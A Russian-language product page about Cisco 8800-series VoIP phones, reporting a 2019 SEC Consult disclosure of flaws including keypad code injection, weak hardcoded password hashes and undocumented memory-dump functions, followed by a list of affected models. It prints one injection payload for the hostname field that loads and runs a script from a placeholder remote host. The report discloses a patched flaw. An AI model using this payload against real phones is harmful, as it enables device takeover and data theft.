Cisco 8800-серия IP-телефонов

Продукт
Разработчики: Cisco Systems
Технологии: IP-телефония,  Офисная техника

Содержание

Серия 8800 включает модели корпоративных VoIP-телефонов Cisco.

2019

Уязвимость в VoIP-телефонах Cisco серии 8800, позволяющая красть данные

Компания SEC Consult 9 января 2019 года сообщила о том, что выявила целый ряд проблем в программных оболочках популярных систем интернет-телефонии Cisco VoIP Phone 8800.

Как отмечается, одна из ключевых проблем заключается в возможности инъекции JavaScript-подобного кода с помощью встроенной клавиатуры T9. Иными словами, злоумышленник может использовать встроенную цифро-буквенную клавиатуру VoIP-телефона для ввода вредоносного кода.

Например, имя хоста телефона можно подменить на код примерно такого содержания:

hostname`><img src=http://$IP/sec.js onload=exec()>,

И он добросовестно скачает посторонний файл (sec.js) с удаленного источника и запустит его.

Помимо этого, в программной оболочке телефонов содержатся многочисленные устаревшие — и, следовательно, небезопасные — библиотеки кода, а также жестко закодированные реквизиты доступа. Они хранятся в виде хэшей в файле с красноречивым названием /etc/passwd; хэширование произведено с помощью устаревшего алгоритма UNIX MD5+salt, вдобавок, как оказалось, сами пароли очень слабые, так что вскрыть их и получить доступ к устройству через SSH оказалось весьма тривиальной задачей.

Обнаружить уязвимости удалось с помощью собственной платформы SEC Consult — IoT Inspector, предназначенной для поиска проблем в программных оболочках устройствах интернета вещей. Бизнес уходит в облако: стратегии и подходы

Был также произведен ручной анализ, позволивший выявить в «прошивке» телефонов незадокументированные, но легко эксплуатируемые функции, позволяющие потенциальному злоумышленнику выводить дампы памяти и, соответственно, красть данные.

«
Проблему нельзя назвать рядовой, — считает Олег Галушкин, директор по безопасности компании SEC Consult Services, российского представительства SEC Consult. — VoIP-телефоны Cisco серии 8800 активно используются по всему миру в госсекторе и в крупном бизнесе — это касается и России, где данные устройства популярны в крупнейших корпорациях. Подобные уязвимости представляют стратегическую угрозу для бизнеса уже потому, что их очень легко эксплуатировать; похищение критически важных данных в подобных случаях также оказывается «общим местом».
»

Описанные уязвимости выявлены в программной оболочке Cisco IP Phone 88xx версии 2-0-1 ES-15 (ID: f86aa7612d9311e6).[1] По сведениям, предоставленных самой корпорацией Cisco, уязвимости затрагивают следующие модели:

  • IP Conference Phone 8832
  • IP Phone 8811
  • IP Phone 8841
  • IP Phone 8845
  • IP Phone 8851
  • IP Phone 8861
  • IP Phone 8865
  • Unified IP Conference Phone 8831
  • Wireless IP Phone 8821
  • Wireless IP Phone 8821-EX

По информации SEC Consult, вендор уже внес необходимые исправления.

Модельный ряд серии 8800

На январь 2019 года модельный ряд VoIP-телефонов Cisco серии 8800 включает:

  • Cisco IP Conference Phone 8832
  • Cisco IP Phone 8865 Key Expansion Module
  • Cisco IP Phone 8865
  • Cisco IP Phone 8861
  • Cisco IP Phone 8851
  • Cisco IP Phone 8851/8861 Key Expansion Module
  • Cisco IP Phone 8845
  • Cisco IP Phone 8841
  • Cisco IP Phone 8811
  • Cisco IP Phone 8800 Key Expansion Module
  • Cisco Unified IP Conference Phone 8831
  • Cisco Wireless IP Phone 8821
  • Cisco Wireless IP Phone 8821-EX

Примечания



СМ. ТАКЖЕ (1)


Подрядчики-лидеры по количеству проектов

За всю историю
2021 год
2022 год
2023 год
Текущий год

  Naumen (Наумен консалтинг) (194)
  МайАстериск (myAsterisk) (104)
  ИнтелТелеком (Инфинити Трейд) (86)
  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (52)
  ЛайфТелеком (Телфин) (24)
  Другие (708)

  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (14)
  Naumen (Наумен консалтинг) (3)
  ЛайфТелеком (Телфин) (3)
  СофтБиКом (SoftBCom) (2)
  Orange Business Services (Оранж Бизнес Сервисез, Эквант) (2)
  Другие (20)

  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (9)
  Naumen (Наумен консалтинг) (8)
  ЛайфТелеком (Телфин) (8)
  МТС Exolve (Межрегиональный ТранзитТелеком, МТТ) (3)
  САТЕЛ (3)
  Другие (14)

  ЛайфТелеком (Телфин) (5)
  Mango Office (Манго Телеком) (5)
  Naumen (Наумен консалтинг) (4)
  Группа компаний ЦРТ (Центр речевых технологий) (4)
  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (2)
  Другие (7)

  ЛайфТелеком (Телфин) (5)
  Naumen (Наумен консалтинг) (4)
  Mango Office (Манго Телеком) (4)
  Нота (Холдинг Т1) (2)
  Edna, ОСК (ранее mfms) (2)
  Другие (14)

Распределение вендоров по количеству проектов внедрений (систем, проектов) с учётом партнёров

За всю историю
2021 год
2022 год
2023 год
Текущий год

  Naumen (Наумен консалтинг) (2, 208)
  ИнтелТелеком (Инфинити Трейд) (1, 112)
  МайАстериск (myAsterisk) (1, 107)
  Avaya (25, 77)
  Microsoft (7, 70)
  Другие (434, 548)

  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (1, 18)
  Naumen (Наумен консалтинг) (1, 5)
  ЛайфТелеком (Телфин) (1, 3)
  Ростелеком (1, 3)
  Avaya (2, 2)
  Другие (10, 10)

  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (1, 9)
  ЛайфТелеком (Телфин) (2, 8)
  Naumen (Наумен консалтинг) (1, 8)
  МТС Exolve (Межрегиональный ТранзитТелеком, МТТ) (2, 3)
  Сател Про (1, 3)
  Другие (11, 15)

  Mango Office (Манго Телеком) (2, 5)
  ЛайфТелеком (Телфин) (1, 5)
  Naumen (Наумен консалтинг) (1, 4)
  Группа компаний ЦРТ (Центр речевых технологий) (1, 4)
  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (1, 2)
  Другие (8, 8)

  ЛайфТелеком (Телфин) (1, 5)
  Naumen (Наумен консалтинг) (1, 5)
  Mango Office (Манго Телеком) (2, 4)
  WhatsApp (1, 2)
  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (1, 2)
  Другие (10, 11)

Распределение систем по количеству проектов, не включая партнерские решения

За всю историю
2021 год
2022 год
2023 год
Текущий год

  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 208
  Call Center Infinity - 112
  CallBox Contact-center - 107
  Skype for Business (ранее Microsoft Lync) - 67
  Р7-Офис - 63
  Другие 525

  Р7-Офис - 18
  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 5
  Ростелеком: Виртуальная АТС - 3
  Телфин.Офис Виртуальная АТС - 3
  Svetets TMS - 2
  Другие 10

  Р7-Офис - 9
  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 8
  Телфин.Офис Виртуальная АТС - 7
  Сател Российский телефонный узел (РТУ) VoIP Платформа - 3
  Softscore UG: Anwork Бизнес-коммуникатор - 2
  Другие 14

  Телфин.Офис Виртуальная АТС - 5
  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 4
  SmartLogger II - 4
  Mango Office Виртуальная АТС ВАТС - 4
  Mango Office Контакт-центр - 2
  Другие 8

  Телфин.Офис Виртуальная АТС - 5
  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 5
  Mango Office Виртуальная АТС ВАТС - 3
  Нота: Dion Платформа корпоративных коммуникаций - 2
  WhatsApp Business - 2
  Другие 12

Подрядчики-лидеры по количеству проектов

За всю историю
2021 год
2022 год
2023 год
Текущий год

  ЭЛАР (Электронный архив, НПО Опыт) (167)
  Техноэволаб (ранее Xerox СНГ) (40)
  Konica Minolta Business Solutions Russia (Коника Минолта Бизнес Сольюшнз Раша) (40)
  X-Com (Икс ком) (39)
  Кортис (36)
  Другие (333)

  ЭЛАР (Электронный архив, НПО Опыт) (18)
  Кортис (14)
  X-Com (Икс ком) (14)
  Konica Minolta Business Solutions Russia (Коника Минолта Бизнес Сольюшнз Раша) (11)
  Техноэволаб (ранее Xerox СНГ) (8)
  Другие (42)

  ЭЛАР (Электронный архив, НПО Опыт) (17)
  Кортис (8)
  X-Com (Икс ком) (6)
  Softline (Софтлайн) (4)
  Crystal Service Integration (CSI, Кристалл Сервис Интеграция) (4)
  Другие (26)

  ЭЛАР (Электронный архив, НПО Опыт) (25)
  Crystal Service Integration (CSI, Кристалл Сервис Интеграция) (3)
  Softline (Софтлайн) (3)
  X-Com (Икс ком) (3)
  АТОЛ (2)
  Другие (10)

  ЭЛАР (Электронный архив, НПО Опыт) (21)
  R-Style Softlab (Эр-Стайл Софтлаб) (5)
  Softline (Софтлайн) (5)
  Гравитон (Ревотех, Революционные технологии) (5)
  X-Com (Икс ком) (3)
  Другие (10)

Распределение вендоров по количеству проектов внедрений (систем, проектов) с учётом партнёров

За всю историю
2021 год
2022 год
2023 год
Текущий год

  ПроСофт-ПК (1, 173)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 173)
  Xerox (33, 108)
  Konica Minolta (Коника Минолта) (13, 48)
  Lenovo (21, 27)
  Другие (917, 252)

  ПроСофт-ПК (1, 20)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 20)
  Xerox (9, 13)
  Konica Minolta (Коника Минолта) (5, 12)
  Lenovo (4, 8)
  Другие (35, 42)

  ПроСофт-ПК (1, 18)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 18)
  Pantum (3, 5)
  Crystal Service Integration (CSI, Кристалл Сервис Интеграция) (2, 4)
  Lenovo (4, 3)
  Другие (22, 24)

  ПроСофт-ПК (1, 25)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 25)
  Crystal Service Integration (CSI, Кристалл Сервис Интеграция) (4, 4)
  АТОЛ (2, 2)
  Inferit (Инферит) (2, 1)
  Другие (12, 10)

  ПроСофт-ПК (1, 21)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 21)
  Гравитон (Ревотех, Революционные технологии) (3, 5)
  3Logic Group (Новый Ай Ти Проект) (2, 5)
  АТОЛ (2, 3)
  Другие (5, 5)

Распределение систем по количеству проектов, не включая партнерские решения

За всю историю
2021 год
2022 год
2023 год
Текущий год

  ЭларСКАН - 173
  Xerox Versant Полноцветные ЦПМ - 51
  Konica Minolta AccurioPress C-серия - 24
  Pantum M-серия МФУ - 17
  YSoft SafeQ - 17
  Другие 347

  ЭларСКАН - 20
  Konica Minolta AccurioPress C-серия - 7
  Pantum M-серия МФУ - 5
  Xerox Versant Полноцветные ЦПМ - 4
  Lenovo ThinkCentre Настольные компьютеры - 4
  Другие 60

  ЭларСКАН - 18
  Pantum BM-серия МФУ - 3
  CSI K Касса самообслуживания - 3
  Ramec Tsunami Персональные компьютеры - 2
  Pantum M-серия МФУ - 2
  Другие 26

  ЭларСКАН - 25
  CSI K Касса самообслуживания - 3
  3Logic Group: Гравитон М-серия Моноблоки - 1
  Ростелеком: Цифровая офисная кабина - 1
  CSI Scan Alpha Сканеры штрихкодов - 1
  Другие 12

  ЭларСКАН - 21
  3Logic Group: Гравитон Н-серия Ноутбуки - 5
  3Logic Group: Гравитон Д-серия Персональные компьютеры - 5
  3Logic Group: Гравитон М-серия Моноблоки - 5
  АТОЛ Онлайн-кассы - 2
  Другие 6